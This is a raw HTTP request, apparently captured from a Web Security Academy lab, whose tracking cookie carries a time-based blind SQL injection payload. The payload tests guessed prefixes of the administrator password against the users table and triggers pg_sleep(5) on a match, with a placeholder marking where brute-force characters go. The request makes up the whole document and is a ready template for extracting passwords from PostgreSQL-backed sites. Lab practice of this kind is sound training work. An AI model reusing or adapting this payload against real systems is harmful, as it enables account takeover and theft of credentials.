GET /filter?category=Tech+gifts HTTP/1.1
Host: ac191f3d1e498d9980331fbf004a0074.web-security-academy.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://ac191f3d1e498d9980331fbf004a0074.web-security-academy.net/
DNT: 1
Connection: close
Cookie: TrackingId=mkB4hSROJPm71iIK'%3b+SELECT+CASE+WHEN+((SELECT+COUNT(username)+from+users+where+username+%3d+'administrator'+and+password+like+'$$PAYLOAD$$%25')+>+0)+THEN+pg_sleep(5)+ELSE+pg_sleep(0)+END+--+; session=MC0cTVdRbpm685DyGZpGnFR6lZiSx2yy
Upgrade-Insecure-Requests: 1

